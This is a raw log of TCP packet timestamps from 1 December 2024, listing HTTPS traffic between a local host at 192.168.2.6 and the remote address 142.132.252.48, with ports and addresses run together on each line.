                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.388341904 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.540143013 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.540164948 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.540487051 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.540505886 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.540565014 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.551222086 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.551242113 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.551395893 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.551417112 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.551470995 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.555681944 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.555701971 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.555773020 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.555787086 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.555841923 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.561549902 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.561570883 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.561650991 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.561650991 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.561671972 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.561765909 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.566936016 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.566956043 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.567034960 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.567043066 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.567090034 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.572753906 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.572772026 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.572823048 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.572828054 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.572843075 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.572894096 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.577641964 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.577671051 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.577724934 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.577730894 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.577747107 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.577773094 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.578419924 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.583259106 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.583277941 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.583334923 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.583340883 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.583400965 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.616586924 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.745229959 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.745256901 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.745342016 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.745356083 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.745439053 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.753109932 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.753128052 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.753386021 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.753406048 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.753448963 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.757647991 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.757664919 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.757702112 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.757714033 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.757786036 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.757786036 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.763350964 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.763370037 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.763406038 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.763417959 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.763437033 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.763458967 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.768986940 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.769005060 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.769076109 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.769077063 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.769088030 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.769155979 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.774051905 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.774070978 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.774111032 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.774122000 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.774175882 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.774175882 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.779764891 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.779789925 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.779840946 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.779848099 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.779865980 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.779889107 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.785356998 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.785377026 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.785450935 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.785460949 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.785501957 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.942795038 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.942821980 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.942914009 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.942924023 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.942950964 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.942964077 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.954293966 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.954314947 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.954427958 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.954443932 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.954550028 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.954550028 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.959419966 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.959439993 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.959489107 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.959498882 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.959530115 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.964438915 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.964468956 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.964526892 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.964540005 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.964553118 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.964684010 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.970105886 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.970134974 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.970175028 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.970182896 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.970196009 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.970235109 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.975723028 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.975743055 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.975816965 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.975826979 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.975905895 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.980771065 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.980792999 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.980843067 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.980861902 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.980892897 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.980892897 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.986807108 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.986843109 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.986900091 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.986910105 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.986924887 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:45.986948013 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.144184113 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.144213915 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.144315004 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.144335032 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.144376040 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.144423008 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.155642986 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.155674934 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.155821085 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.155833006 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.155881882 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.160648108 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.160671949 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.160738945 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.160748005 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.160764933 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.160826921 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.166431904 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.166452885 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.166527987 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.166536093 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.166584015 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.171334982 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.171359062 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.171411037 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.171426058 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.171462059 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.171462059 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.177014112 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.177040100 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.177114010 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.177114010 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.177123070 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.177167892 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.182765007 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.182781935 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.182872057 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.182888985 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.182934999 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.187694073 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.187711000 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.187777996 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.187787056 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.187834024 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.231928110 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.345580101 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.345604897 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.345721006 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.345731020 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.345788002 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.349319935 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.356779099 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.356806993 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.356856108 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.356863022 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.356929064 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.359780073 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.361901045 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.361929893 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.361999989 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.361999989 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.362009048 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.362134933 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.367624998 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.367645979 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.367741108 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.367747068 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.367811918 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.372598886 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.372616053 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.372775078 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.372782946 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.372827053 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.378264904 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.378282070 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.378340006 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.378350973 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.378460884 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.383881092 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.383900881 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.383985043 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.383996010 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.384090900 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.389038086 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.389059067 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.390135050 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.390142918 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.390299082 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.546730042 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.546756029 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.547094107 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.547101974 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.547147989 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.558036089 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.558059931 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.558145046 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.558145046 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.558156967 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.558264017 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.558828115 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.563327074 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.563350916 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.563963890 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.563981056 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.564027071 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.568391085 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.568414927 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.568453074 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.568459988 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.568526983 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.573991060 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.574014902 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.574079037 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.574091911 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.574115992 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.574131966 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.579662085 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.579684019 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.579722881 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.579734087 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.579770088 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.579770088 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.584659100 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.584681988 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.584741116 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.584747076 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.584784031 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.584798098 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.590373993 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.590398073 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.590465069 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.590477943 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.590516090 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.726114035 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:46.748636007 CET44349721142.132.252.48192.168.2.6
